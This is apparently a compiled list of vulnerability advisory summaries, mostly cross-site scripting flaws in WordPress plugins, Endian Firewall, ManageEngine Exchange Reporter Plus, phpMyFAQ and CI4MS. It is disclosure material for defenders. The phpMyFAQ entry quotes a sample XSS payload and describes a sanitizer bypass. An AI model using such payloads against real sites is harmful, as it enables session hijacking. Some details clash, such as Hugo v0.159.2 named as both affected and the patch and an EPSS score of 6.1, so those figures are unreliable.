Cross-Site Scripting

Cross-site scripting (XSS) in Akaunting up to version 3.1.21 allows authenticated users to inject malicious scripts via the notes parameter in the Invoice/Billing component, potentially compromising other users' sessions when they view affected invoices. The vulnerability requires user interaction (UI:P) to trigger and has publicly available exploit code; however, vendor remediation response is unknown.

Cross-site scripting (XSS) in code-projects Simple Laundry System 1.0 allows remote attackers to inject malicious scripts via the userid parameter in /modstaffinfo.php, affecting confidentiality and integrity of user sessions. The vulnerability requires user interaction (clicking a crafted link) and has a publicly available exploit (CVSS 4.3, EPSS signal: E:P indicates public exploit availability). This is a stored or reflected XSS vulnerability in a PHP-based application with low CVSS severity but non-negligible real-world risk due to ease of exploitation and public disclosure.

Stored or reflected cross-site scripting (XSS) in code-projects Simple Laundry System 1.0 allows remote attackers to inject malicious scripts via the userid parameter in /modmemberinfo.php, potentially compromising user sessions or stealing sensitive data. The vulnerability requires user interaction (UI:R) and publicly available exploit code exists, elevating the practical risk despite the moderate CVSS 4.3 score.

Stored cross-site scripting (XSS) in code-projects Simple Laundry System 1.0 allows unauthenticated remote attackers to inject malicious scripts via the firstName parameter in /modifymember.php, which are executed in the context of other users' browsers. The vulnerability has a CVSS score of 4.3 with low impact severity but publicly available exploit code, though exploitation requires user interaction (UI:R). This represents a typical reflected or stored XSS in a parameter handler with limited immediate risk due to no confidentiality or availability impact, though it enables session hijacking and credential theft.

Cross-site scripting (XSS) in badlogic pi-mono 0.58.4 SVG Artifact Handler allows unauthenticated remote attackers to inject malicious scripts via the SvgArtifact.ts component, affecting application integrity when users interact with crafted SVG artifacts. Publicly available exploit code exists, and the vendor has not responded to disclosure despite early notification.

Stored Cross-Site Scripting in Visitor Traffic Real Time Statistics WordPress plugin (≤8.4) allows unauthenticated remote attackers to inject malicious JavaScript via the 'page_title' parameter that executes when administrators view the Traffic by Title section. No public exploit identified at time of analysis, though CVSS 7.2 (High) severity reflects the unauthenticated attack vector and cross-site scripting scope. Upstream fix available (PR/commit); released patched version not independently confirmed based on provided Trac changeset reference.

Stored cross-site scripting (XSS) in WPFunnels - Easy Funnel Builder plugin for WordPress versions up to 3.7.9 allows authenticated contributors and higher-privileged users to inject arbitrary JavaScript via the 'button_icon' parameter in the 'wpf_optin_form' shortcode due to insufficient input sanitization and output escaping. The injected scripts execute in the context of any user viewing the affected page, potentially compromising website visitors and enabling session hijacking, credential theft, or malware distribution. This vulnerability requires authenticated attacker access but affects all site visitors who view injected pages.

Stored Cross-Site Scripting in WP Travel Engine plugin versions up to 6.7.5 allows authenticated contributors and above to inject malicious scripts via the 'wte_trip_tax' shortcode due to insufficient input sanitization and output escaping. When site visitors access pages containing the injected payload, the arbitrary JavaScript executes in their browsers, enabling session hijacking, credential theft, or malware distribution. No public exploit code or active exploitation has been identified at time of analysis.

Stored cross-site scripting (XSS) in the Widgets for Social Photo Feed WordPress plugin (versions ≤1.7.9) allows unauthenticated remote attackers to inject malicious scripts via unsanitized 'feed_data' parameter keys, achieving persistent code execution in victim browsers with scope change impact. The vulnerability stems from insufficient input validation on widget configuration data. CVSS 7.2 reflects network-accessible, low-complexity exploitation requiring no privileges or user interaction, with changed scope enabling attacks beyond the vulnerable component. Patch released in version 1.8 per WordPress.org changeset references. No confirmed active exploitation (not in CISA KEV) or public proof-of-concept identified at time of analysis, though the technical simplicity and unauthenticated attack vector present moderate real-world risk for sites using affected versions.

Stored Cross-Site Scripting in Xpro Addons - 140+ Widgets for Elementor plugin up to version 1.4.20 allows authenticated contributors and above to inject malicious scripts via the Pricing Widget's 'onClick Event' setting, which execute in the browsers of any user viewing the affected pages. The vulnerability stems from insufficient input sanitization and output escaping, enabling persistent XSS attacks that compromise site integrity and user sessions. No active exploitation has been confirmed, but the low attack complexity and contributor-level access requirement present a moderate real-world risk for WordPress sites with contributor user bases.

Stored Cross-Site Scripting (XSS) in Simple Shopping Cart WordPress plugin versions up to 5.2.4 allows authenticated contributors and above to inject arbitrary JavaScript via the 'wpsc_display_product' shortcode attributes due to insufficient input sanitization and output escaping. Injected scripts execute in the browsers of all users viewing affected pages. No public exploit code or active exploitation has been reported at time of analysis.

Stored Cross-Site Scripting (XSS) in WP Shortcodes Plugin - Shortcodes Ultimate up to version 7.4.7 allows authenticated contributors and above to inject arbitrary JavaScript via the 'src' attribute of the su_lightbox shortcode, which executes in the browsers of all users viewing the affected page. The vulnerability stems from insufficient input sanitization and output escaping, requiring only contributor-level access to exploit. No public exploit code or active exploitation has been confirmed at time of analysis.

Stored Cross-Site Scripting in WP Shortcodes Plugin - Shortcodes Ultimate up to version 7.4.8 allows authenticated attackers with author-level permissions to inject arbitrary JavaScript into pages via the su_carousel shortcode's 'su_slide_link' attachment meta field. The vulnerability stems from insufficient input sanitization and output escaping, enabling malicious scripts to execute when any user visits an affected page. No public exploit code or active exploitation has been identified at the time of analysis.

Stored Cross-Site Scripting in ElementsKit Elementor Addons and Templates plugin (versions up to 3.7.9) allows authenticated contributors and above to inject malicious scripts via the 'ekit_tab_title' parameter in the Simple Tab widget due to insufficient input sanitization and output escaping. Injected scripts execute when users access affected pages. No public exploit code or active exploitation has been identified at time of analysis.

Stored Cross-Site Scripting (XSS) in Royal Addons for Elementor plugin allows authenticated contributors and above to inject arbitrary JavaScript via the 'button_text' parameter, affecting all versions through 1.7.1049. The vulnerability stems from insufficient input sanitization and output escaping, enabling attackers to execute malicious scripts in the context of any user visiting an affected page. No public exploit code or active exploitation has been identified at time of analysis.

Stored cross-site scripting in Ultimate Member plugin versions up to 2.11.1 allows authenticated subscribers and above to inject arbitrary JavaScript via the user description field when HTML support is enabled, executing malicious scripts in pages viewed by other users. The vulnerability requires prior authentication and user interaction but affects site visitors broadly once injected. Wordfence reported the issue; a fix is available in patched versions.

Stored Cross-Site Scripting (XSS) in Xpro Addons - 140+ Widgets for Elementor plugin for WordPress up to version 1.4.24 allows authenticated contributors and above to inject malicious scripts via the Icon Box widget that execute for all users viewing affected pages. The vulnerability stems from insufficient input sanitization and output escaping, making it a direct code injection risk in a widely-used page builder extension. CVSS 6.4 reflects moderate severity with limited direct impact (confidentiality and integrity) but cross-site scope; no public exploit code or active exploitation has been identified at time of analysis.

Stored Cross-Site Scripting in Gutenverse - Ultimate WordPress FSE Blocks Addons & Ecosystem plugin versions up to 3.4.6 allows authenticated attackers with contributor-level access or higher to inject arbitrary JavaScript via the 'imageLoad' parameter, resulting in persistent script execution in pages viewed by other users. CVSS 6.4 reflects medium severity with cross-site scope; no public exploit code or active exploitation has been identified at the time of analysis, but the vulnerability requires only low privileges and no user interaction beyond initial page access.

Cross-site scripting (XSS) vulnerability in Hugo's default markdown to HTML renderer fails to properly escape links and image links, allowing injection of malicious scripts through markdown content. Hugo v0.159.2 and earlier are affected. Users who employ custom render hooks for links and images, or who trust all markdown content sources, are not vulnerable. Vendor-released patch: v0.159.2.

Stored cross-site scripting (XSS) in Emlog's comment module allows unauthenticated remote attackers to inject malicious scripts via URI scheme validation bypass, affecting all versions prior to 2.6.8. The vulnerability requires user interaction (clicking a malicious link) and can result in session hijacking, credential theft, or malware distribution to website visitors. No public exploit code or active exploitation has been confirmed at time of analysis.

Stored cross-site scripting (XSS) in Budibase's Builder Command Palette (versions prior to 3.32.5) enables authenticated Builder users to inject malicious HTML payloads via entity names (tables, views, queries, automations), achieving session hijacking and account takeover when other Builder-role users invoke the Command Palette. CVSS 8.7 with changed scope reflects the cross-user attack vector. No public exploit identified at time of analysis, though the attack technique is straightforward for authenticated insiders. EPSS data unavailable; patch available in version 3.32.5.

Stored cross-site scripting (XSS) in Casdoor 2.356.0 via the dangerouslySetInnerHTML function allows authenticated remote attackers to inject malicious scripts through the formCss, formCssMobile, or formSideHtml parameters. An attacker with authenticated access can craft payloads that execute arbitrary JavaScript in the context of other users' browsers when they view affected forms. Publicly available exploit code exists for this vulnerability, and the vendor has not responded to early disclosure attempts, indicating no coordinated patch timeline.

Stored cross-site scripting in Zohocorp ManageEngine Exchange Reporter Plus (pre-5802) allows authenticated attackers to inject malicious scripts via the Permissions Based on Mailboxes report, potentially compromising administrator sessions and stealing high-privilege credentials. Attack requires low complexity and user interaction from a victim administrator. CVSS 7.3 (High) reflects significant confidentiality and integrity impact. No public exploit identified at time of analysis, with EPSS data unavailable for this recently disclosed vulnerability.

Stored cross-site scripting (XSS) in Zohocorp ManageEngine Exchange Reporter Plus versions prior to 5802 allows authenticated attackers to inject malicious scripts through the Non-Owner Mailbox Permission report, potentially compromising confidentiality and integrity of user sessions. With CVSS 7.3 (High) and EPSS data unavailable, exploitation requires low attack complexity and authenticated access with user interaction. No public exploit identified at time of analysis, and vendor has released patched version 5802.

Stored cross-site scripting in ManageEngine Exchange Reporter Plus before version 5802 allows authenticated attackers to inject malicious scripts via the Folder Message Count and Size report. With CVSS 7.3 (High severity) and requiring low-privilege authentication with user interaction, successful exploitation enables session hijacking and credential theft within the administrative interface. No public exploit identified at time of analysis, though CVSS vector indicates network-accessible attack surface with low complexity.

Stored cross-site scripting in ManageEngine Exchange Reporter Plus (versions prior to 5802) allows authenticated attackers to inject malicious scripts through the Public Folder Client Permissions report, enabling session hijacking and credential theft with medium exploitation complexity. No active exploitation confirmed (not present in CISA KEV), though the network-accessible attack vector and stored nature of the XSS elevate real-world risk for organizations using this Exchange monitoring solution.

Stored cross-site scripting in ManageEngine Exchange Reporter Plus (versions prior to 5802) allows authenticated attackers with low privileges to inject malicious scripts into Equipment Mailbox Details reports, enabling session hijacking and credential theft against administrative users who view the poisoned reports. No active exploitation confirmed (not in CISA KEV), but the vulnerability affects organizations monitoring Microsoft Exchange environments through ManageEngine's reporting platform.

Stored cross-site scripting (XSS) in ManageEngine Exchange Reporter Plus before version 5802 allows authenticated attackers to inject malicious scripts into the 'Mails Exchanged Between Users' report. With CVSS 7.3 (High severity) and low attack complexity (AC:L), this vulnerability requires low-privilege authentication (PR:L) and user interaction (UI:R) to achieve high confidentiality and integrity impact. No public exploit identified at time of analysis, though authentication requirements lower the barrier for insider threats or compromised accounts.

Stored cross-site scripting (XSS) in ManageEngine Exchange Reporter Plus before version 5802 allows authenticated attackers with low privileges to inject malicious scripts into the Permissions based on Distribution Groups report, potentially leading to session hijacking and account compromise of administrators viewing the report. No active exploitation confirmed (CISA KEV absent), but the network-accessible attack vector and low complexity make this exploitable with publicly documented vendor advisory details.

Stored cross-site scripting (XSS) in ManageEngine Exchange Reporter Plus versions prior to 5802 allows authenticated attackers with low privileges to inject malicious scripts into Distribution Lists reports that execute when viewed by other users, potentially compromising session tokens and account credentials of administrators or other privileged users. The vulnerability requires user interaction (victim must view the malicious report) but enables high-impact attacks against confidentiality and integrity within the application scope. No public exploit code or active exploitation has been identified at time of analysis.

Stored cross-site scripting (XSS) in ci4-cms-erp/ci4ms profile management enables privilege escalation to full administrative compromise. Attackers inject malicious JavaScript payloads through unsanitized profile name fields, which execute persistently across multiple application interfaces including administrative user management pages and public-facing blog views. When administrators access affected pages, the stored payload executes in their browser context, enabling session hijacking and complete account takeover. Vendor patch available per GitHub security advisory. This represents a critical privilege escalation vector requiring immediate remediation in any deployment with multiple user roles.

Remote code execution in D-Tale allows unauthenticated attackers to execute arbitrary code on servers hosting D-Tale publicly when using Redis or Shelf storage backends. The vulnerability stems from improper input validation in the storage layer, affecting D-Tale versions prior to 3.22.0. Vendor-released patch version 3.22.0 is available.

Cross-site scripting (XSS) in Roundcube Webmail before versions 1.5.14 and 1.6.14 allows remote attackers to inject malicious scripts via insufficient HTML sanitization in text/html attachment preview mode. An authenticated user must preview a malicious text/html attachment to trigger the vulnerability, enabling attackers to steal session cookies, redirect users, or perform actions on behalf of the victim. No public exploit code or active exploitation has been confirmed; EPSS score of 6.1 reflects moderate real-world risk given the user interaction requirement.

Context isolation bypass in Electron applications enables privilege escalation when VideoFrame objects are bridged to the main world. Attackers with XSS capabilities can leverage improperly bridged WebCodecs API VideoFrame objects to escape the isolated context and access Node.js APIs exposed in preload scripts. CVSS 8.4 (High) with network attack vector requiring high complexity and user interaction. No public exploit identified at time of analysis, though proof-of-concept development is feasible given the detailed vendor disclosure.

Cross-site scripting (XSS) in Shynet before version 0.14.0 allows unauthenticated remote attackers to inject arbitrary scripts through the urldisplay and iconify template filters, potentially compromising user sessions and data integrity with medium attack complexity and cross-site scope. The vulnerability affects the analytics platform's template rendering layer and has been patched in version 0.14.0 with no confirmed active exploitation reported.

Cross-site scripting (XSS) vulnerability in CERT/CC cveClient cveInterface.js prior to version 1.0.24 allows injection of arbitrary HTML through untrusted CVE API service input. The vulnerability stems from insufficient input validation, enabling attackers to inject malicious scripts that execute in the context of users viewing CVE data. No CVSS score or exploitation data is available, limiting quantitative risk assessment; however, the attack vector is network-based and requires no authentication.

Stored cross-site scripting (XSS) in Hoppscotch prior to version 2026.3.0 allows authenticated users to inject malicious scripts via the team member display name field, which executes when other users view the overflow tooltip. The vulnerability requires user interaction (viewing the tooltip) and affects the confidentiality and integrity of affected sessions with a CVSS score of 5.4. No public exploit code or active exploitation has been identified at time of analysis.

Stored cross-site scripting (XSS) in Hoppscotch versions prior to 2026.3.0 enables remote attackers to execute arbitrary JavaScript in victim browsers without authentication, potentially escalating to cross-site request forgery (CSRF) attacks against authenticated users. CVSS 8.5 (High) reflects network accessibility with low complexity but user interaction required. No public exploit identified at time of analysis, though the attack surface is well-understood for stored XSS vectors in API development tools where malicious payloads persist in shared workspaces or collections.

Arbitrary code execution in AWS Kiro IDE versions prior to 0.8.140 occurs when a local user opens a maliciously crafted workspace containing an unsanitized color theme name, exploiting improper neutralization of input during webview generation. The attack requires user interaction (trusting the workspace when prompted) and can deliver full system compromise with high confidentiality, integrity, and availability impact. No public exploit identified at time of analysis, though SSVC framework rates technical impact as total with manual (non-automatable) exploitation potential.

Stored cross-site scripting (XSS) in Frappe Learning Management System versions 2.27.0 through 2.47.x allows unauthenticated remote attackers to inject and persist malicious scripts that execute in the browsers of other users. The vulnerability affects content structure functionality and has been patched in version 2.48.0. No public exploit code or active exploitation has been confirmed at time of analysis.

Stored cross-site scripting (XSS) in Krayin Laravel-CRM up to version 2.2 allows authenticated users with low privileges to inject malicious scripts via the composeMail function in the Activities/Notes Module, which are then executed when other users view the content. The vulnerability requires user interaction (UI:P) but has confirmed publicly available exploit code and a vendor-released patch (commit 73ed28d466bf14787fdb86a120c656a4af270153), making it a moderate priority for deployments where multiple users interact with notes and mail features.

Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the remark parameter in the /manage/password/web/ endpoint. The injected payload is persistently stored and executes when other authenticated users access the affected page, enabling session hijacking, credential theft, or lateral movement within the firewall management interface. No public exploit code or active exploitation has been confirmed at the time of analysis.

Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and earlier allows authenticated attackers to inject arbitrary JavaScript via the new_cert_name parameter in the /manage/ca/certificate/ endpoint. The injected payload is stored and executed when other users access the affected page, enabling session hijacking, credential theft, or malware distribution within the firewall management interface. No public exploit code or active exploitation has been confirmed at the time of this analysis.

Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the remark parameter in the VPN authentication user management interface (/manage/vpnauthentication/user/). The injected payload persists in the database and executes when other authenticated users access the affected page, enabling session hijacking, credential theft, or lateral privilege escalation within the firewall management console.

Stored cross-site scripting in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject malicious JavaScript via the remark parameter in the IPSec management interface (/manage/ipsec/), which persists and executes when other users access the affected page. This requires user interaction (page view) and only affects session integrity and information disclosure within the administrative interface. No public exploit code or active exploitation has been confirmed at the time of analysis.

Stored cross-site scripting in Endian Firewall 3.3.25 and earlier allows authenticated attackers to inject arbitrary JavaScript via the REMARK parameter in /cgi-bin/openvpnclient.cgi, with the payload persisted and executed when other users access the affected page. CVSS 5.1 reflects low immediate impact due to user interaction requirement and limited scope, but the stored nature increases attack persistence; no public exploit code or CISA KEV confirmation identified at time of analysis.

Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject malicious JavaScript via the remark parameter in the DNS local domains management interface (/manage/dnsmasq/localdomains/). The injected payload persists in the application and executes when other authenticated users access the affected page, enabling session hijacking, credential theft, or malware distribution within the firewall management environment. No public exploit code or active exploitation has been reported.

Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the ADDRESS BCC parameter in /cgi-bin/smtprouting.cgi, with the payload executed when other users view the affected page. The vulnerability requires user interaction (UI:P) and authenticated access (PR:L), limiting real-world impact to internal threat actors with valid credentials, though successful exploitation could compromise session integrity and user data within the firewall management interface.

Stored cross-site scripting in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the domain parameter in the /manage/smtpscan/domainrouting/ endpoint, with execution when other authenticated users view the page. The vulnerability requires user interaction (page view) and authenticated access, resulting in a CVSS score of 5.1 with scope change and integrity impact to other users' sessions. No public exploit code or active exploitation has been identified at time of analysis.

Stored cross-site scripting in Endian Firewall versions 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the DOMAIN parameter in /cgi-bin/smtpdomains.cgi, which is executed when other users view the affected page. The vulnerability requires user interaction and authenticated access but can impact session security and administrative controls. No public exploit code or active exploitation has been identified at time of analysis.

Stored cross-site scripting in Endian Firewall version 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the group parameter in /cgi-bin/proxygroup.cgi, with the malicious payload persisting and executing when other users access the affected page. CVSS score of 5.1 reflects moderate severity with limited scope of impact; exploitation requires prior authentication and user interaction but can affect confidentiality and integrity within the application context. No public exploit code or active exploitation has been confirmed at the time of analysis.

Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the user parameter in /cgi-bin/proxyuser.cgi, which is then executed when other users view the affected page. This requires user interaction (page view) but enables session hijacking, credential theft, or administrative action abuse within the firewall's web interface. No public exploit code or active exploitation has been confirmed at time of analysis.

Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the mimetypes parameter in /cgi-bin/proxypolicy.cgi, which is executed when other users access the affected page. CVSS 5.1 reflects moderate impact; exploitation requires prior authentication and user interaction, limiting real-world severity despite the persistent nature of stored XSS. No public exploit code or active exploitation has been identified at time of analysis.

Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the remark parameter in /cgi-bin/xtaccess.cgi, which is executed when other users view the affected page. The vulnerability requires valid user credentials and user interaction but can compromise session tokens and sensitive data of administrators and other firewall users. No public exploit code or active exploitation has been confirmed at this time.

Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and earlier allows authenticated attackers to inject arbitrary JavaScript via the remark parameter in /cgi-bin/vpnfw.cgi, which persists and executes when other users access the affected page. CVSS 5.1 reflects low immediate confidentiality/integrity impact but user interaction requirement; the vulnerability requires authenticated access (PR:L), limiting blast radius compared to unauthenticated XSS.

Stored cross-site scripting in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject malicious JavaScript via the remark parameter in /cgi-bin/zonefw.cgi, which persists and executes when other administrators or users access the affected configuration page. The vulnerability requires user interaction (UI:P) and authenticated access (PR:L), limiting immediate risk but enabling account compromise and lateral movement within firewall administrative interfaces.

Endian Firewall 3.3.25 and earlier allows authenticated users to store arbitrary JavaScript in the remark parameter of /cgi-bin/outgoingfw.cgi, which executes when other users view the affected page. This stored cross-site scripting (XSS) vulnerability requires valid login credentials but can compromise session tokens, steal administrative actions, or perform lateral attacks within the firewall management interface. No public exploit code or active exploitation has been confirmed at time of analysis.

Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and earlier allows authenticated attackers to inject arbitrary JavaScript through the remark parameter in /cgi-bin/incoming.cgi, which is then executed when other users access the affected page. The vulnerability requires user interaction (UI:P) and authenticated access (PR:L), resulting in a CVSS 5.1 score with limited scope impact; no public exploit code or active exploitation has been confirmed.

Stored XSS in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject malicious JavaScript via the remark parameter in /cgi-bin/snat.cgi, which persists and executes when other administrators or users access the affected page. The vulnerability requires low-privilege authentication and user interaction (page view), limiting immediate impact but creating persistent data integrity and session hijacking risks within the appliance administrative interface.

Stored cross-site scripting in Endian Firewall 3.3.25 and prior allows authenticated users to inject malicious JavaScript via the remark parameter in /cgi-bin/dnat.cgi, which persists and executes when other administrators or users access the affected page. This requires valid login credentials but can compromise the integrity and confidentiality of management sessions for other users.

Stored cross-site scripting in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the dscp parameter in the QoS rules management interface (/manage/qos/rules/). When other authenticated users view the affected configuration page, the injected script executes in their browser context, enabling session hijacking, credential theft, or lateral movement within the firewall management console. EPSS risk is elevated at moderate severity (CVSS 5.1), and no public exploit code or active exploitation has been confirmed.

Stored cross-site scripting in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the name parameter in the QoS classes management interface (/manage/qos/classes/), which is executed when other users access the affected page. The vulnerability requires user interaction and authentication, resulting in a CVSS 5.1 score with limited scope of impact; no public exploit code or active exploitation has been confirmed.

Stored cross-site scripting (XSS) in Endian Firewall version 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the remark user ham spam parameter in /cgi-bin/salearn.cgi. The injected payload is stored and executed in the browsers of other users who view the affected page, enabling session hijacking, credential theft, or malware distribution. No public exploit code or active exploitation has been confirmed; real-world risk is limited by the authentication requirement and user interaction dependency.

Endian Firewall 3.3.25 and earlier contains stored cross-site scripting (XSS) in the DHCP fixed leases management interface, where the remark parameter fails to sanitize user input. An authenticated attacker can inject malicious JavaScript into the remark field at /manage/dhcp/fixed_leases/ that persists in the application and executes in the browsers of other administrators viewing the same page, enabling session hijacking, credential theft, or unauthorized configuration changes. No public exploit code or active exploitation has been confirmed; however, the vulnerability requires only low-privilege authentication and normal user interaction to trigger.

Stored cross-site scripting in Endian Firewall 3.3.25 and earlier allows authenticated attackers to inject arbitrary JavaScript via the NAME parameter in /cgi-bin/uplinkeditor.cgi, which is executed when other users access the affected page. The vulnerability requires user interaction (UI:P) and low privileges (PR:L), limiting immediate automated exploitation but enabling account compromise and lateral privilege escalation within authenticated user populations. No public exploit code or active exploitation has been identified at time of analysis.

Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the remark parameter in the /manage/dnsmasq/hosts/ endpoint. The injected payload is stored server-side and executed in the browsers of any user who subsequently views the affected page, enabling session hijacking, credential theft, or malware distribution. CVSS 5.1 reflects the moderate impact and requirement for user interaction; no public exploit code or active exploitation has been confirmed at time of analysis.

Stored cross-site scripting in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject malicious JavaScript via the remark parameter in /cgi-bin/routing.cgi, which persists and executes when other users access the affected page. The vulnerability requires user interaction (UI:P) and authenticated access (PR:L), limiting its immediate blast radius, but enables session hijacking, credential theft, or administrative impersonation within the firewall management interface.

Cross-site scripting (XSS) in Progress Flowmon prior to versions 12.5.8 and 13.0.6 allows attackers to execute arbitrary actions within an administrator's authenticated session by tricking them into clicking a malicious link. The vulnerability exploits insufficient input validation or output encoding, enabling attackers to inject and execute malicious scripts in the context of a trusted user's browser session.

Stored cross-site scripting (XSS) in Xiaopi Panel 1.0.0 via the param argument in /demo.php allows authenticated remote attackers to inject malicious scripts that execute in users' browsers. The vulnerability affects the WAF Firewall component, has publicly available exploit code, and carries a low CVSS score (3.5) due to requirement for user interaction and limited impact scope, though the vendor has not responded to disclosure.

DOM-based cross-site scripting (XSS) in MSTW League Manager WordPress plugin through version 2.10 allows authenticated attackers to inject malicious scripts that execute in the context of other users' browsers, potentially stealing session tokens, modifying league data, or performing actions on behalf of victims. The vulnerability requires user interaction (UI:R) and affects the plugin across all versions up to 2.10.

SEPPmail Secure Email Gateway before version 15.0.3 allows unauthenticated attackers to inject arbitrary HTML into notification emails about new CA certificates, enabling stored cross-site scripting (XSS) attacks against email recipients. An attacker with the ability to trigger CA certificate notifications can craft malicious HTML payloads that execute when recipients view the notification email, potentially leading to credential theft, malware distribution, or further compromise of email infrastructure. No public exploit code or active exploitation has been confirmed at the time of analysis.

Stored cross-site scripting (XSS) in SourceCodester Simple Customer Relationship Management System 1.0 allows authenticated remote attackers to inject malicious scripts via the Description parameter in the /create-ticket.php Create Ticket component. The vulnerability requires user interaction (UI:R) to trigger payload execution and has limited impact (integrity only, no confidentiality or availability loss), but publicly available exploit code exists and the issue has been publicly disclosed.

Reflected cross-site scripting (XSS) in itsourcecode Payroll Management System up to version 1.0 allows remote attackers to inject malicious scripts via the 'page' parameter in /navbar.php. The vulnerability requires user interaction (UI:R per CVSS vector) but carries a low CVSS score of 4.3 due to limited confidentiality impact. Publicly available exploit code exists, increasing real-world risk despite the moderate base score.

Authenticated stored cross-site scripting (XSS) in IBM Content Navigator versions 3.0.15, 3.1.0, and 3.2.0 allows logged-in users to inject arbitrary JavaScript into the Web UI, potentially enabling credential theft or session hijacking within trusted browser contexts. The vulnerability requires user interaction (UI:R) and authenticated access (PR:L), limiting exposure to insider threats and social engineering scenarios where victims click attacker-controlled links. No public exploit code or active exploitation has been confirmed; patch availability from IBM mitigates the risk for patched deployments.

Reflected cross-site scripting (XSS) vulnerabilities in Interzen Consulting ZenShare Suite v17.0 login.php endpoint allow remote unauthenticated attackers to execute arbitrary JavaScript in a user's browser by injecting malicious payloads into the codice_azienda and red_url parameters. Attack requires user interaction (clicking a crafted link) and affects the authentication process; no public exploit code or active exploitation has been confirmed at time of analysis.

Reflected XSS in Interzen Consulting ZenShare Suite v17.0 login_newpwd.php endpoint allows unauthenticated remote attackers to execute arbitrary JavaScript in users' browsers by injecting malicious code into the codice_azienda parameter via a crafted URL. No public exploit code or active exploitation has been confirmed at the time of this analysis, though the vulnerability is straightforward to demonstrate and likely poses a practical risk to organizations using this product.

Session fixation in listmonk v6.0.0 allows authenticated sessions to persist after password reset or password change, enabling attackers with stolen session cookies to maintain account access despite credential recovery by the victim. Authenticated remote attackers (PR:L) can exploit this to retain high confidentiality impact access. No public exploit code identified at time of analysis, though the vulnerability is trivially reproducible per the detailed proof-of-concept. EPSS data not available; vulnerability confirmed in production release v6.0.0 via GitHub Security Advisory.

Stored XSS via HTML entity-encoded javascript: URLs in SVG files in phpMyFAQ enables privilege escalation from editor to admin. The regex-based sanitizer in SvgSanitizer.php fails to detect entity-encoded payloads like javascript: (javascript:), allowing any user with edit_faq permission to upload malicious SVGs that execute arbitrary JavaScript in admin browsers. Publicly available proof-of-concept demonstrates both basic XSS and complete admin account creation, with confirmed working exploitation in Chrome 146 and Edge.

HTML injection in IBM Aspera Shares 1.9.9 through 1.11.0 allows authenticated remote attackers with high privileges to inject malicious HTML that executes in victim browsers within the hosting site's security context, requiring user interaction to view the injected content. CVSS 4.8 indicates low overall severity; patch is available from IBM.

HTTP header injection in IBM Aspera Shares 1.9.9 through 1.11.0 allows authenticated attackers to conduct cross-site scripting, cache poisoning, and session hijacking attacks via improper validation of HOST headers. The vulnerability requires authenticated access and carries a CVSS score of 5.4 with moderate confidentiality and integrity impact. No public exploit code or active exploitation has been confirmed.

Stored cross-site scripting in IBM Aspera Shares 1.9.9 through 1.11.0 allows authenticated high-privilege users to inject arbitrary JavaScript into the Web UI, potentially enabling credential theft or session hijacking within trusted browser sessions. CVSS 5.5 reflects the requirement for elevated privileges but global scope impact; no public exploit or active exploitation confirmed.

Stored cross-site scripting (XSS) in phpMyFAQ allows authenticated administrators to inject unquoted or single-quoted event handler attributes that bypass the content sanitization pipeline, resulting in arbitrary JavaScript execution for all FAQ page visitors. The vulnerability exists in the removeAttributes() regex filter (line 174 of Filter.php) which only matches double-quoted HTML attributes, allowing payloads like <img src=x onerror=alert(1)> to persist and execute in the browser when the FAQ is rendered with the |raw Twig filter. Despite requiring administrator privileges to create the malicious FAQ, the XSS executes for all unauthenticated and authenticated users viewing the public FAQ page, enabling session hijacking, credential theft, and malware distribution.

Stored XSS in DbGate npm package escalates to remote code execution in Electron desktop app via unsanitized SVG icon rendering. Attackers who inject malicious SVG payloads into application definition files can execute arbitrary JavaScript when victims view matching database entries. In the Electron desktop client, insecure configuration (nodeIntegration: true, contextIsolation: false) allows XSS payloads to invoke Node.js APIs, enabling local code execution including file system access. Web deployments face session hijacking and credential theft. EPSS data not available; vendor patch released via GitHub commit a7d2ed1. No active exploitation confirmed (not in CISA KEV), but detailed proof-of-concept demonstrates both XSS and RCE paths.

HTTP response splitting in ewe's encode_headers function allows remote attackers to inject arbitrary HTTP response headers and content by embedding CRLF sequences in user-controlled response header values, enabling cache poisoning and cross-site scripting attacks. The vulnerability affects ewe versions that do not validate outgoing response header keys and values, despite implementing equivalent validation for incoming request headers. A proof-of-concept demonstrates injection of custom headers through a redirect URL parameter passed directly to the Location header without sanitization.

Stored cross-site scripting in CI4MS backend user management allows authenticated attackers with low-level privileges to inject malicious JavaScript that executes automatically when administrators access affected pages, enabling session hijacking and full administrative account takeover. The vulnerability affects all versions prior to 0.31.0.0 with a critical CVSS score of 9.9 due to scope change and high impact across confidentiality, integrity, and availability. EPSS data not available; no public exploit code or active exploitation confirmed at time of analysis, though the technical barrier is low (AC:L, PR:L).

Stored cross-site scripting in CI4MS blog category management allows authenticated users to inject malicious JavaScript that executes across multiple application contexts including public blog pages and administrative interfaces. Affecting all versions prior to 0.31.0.0, attackers with low-privilege authenticated access can achieve scope change with high impact to confidentiality, integrity, and availability (CVSS 9.9). Vendor-released patch available in version 0.31.0.0. No public exploit identified at time of analysis, though EPSS data unavailable and exploitation is straightforward given low attack complexity.

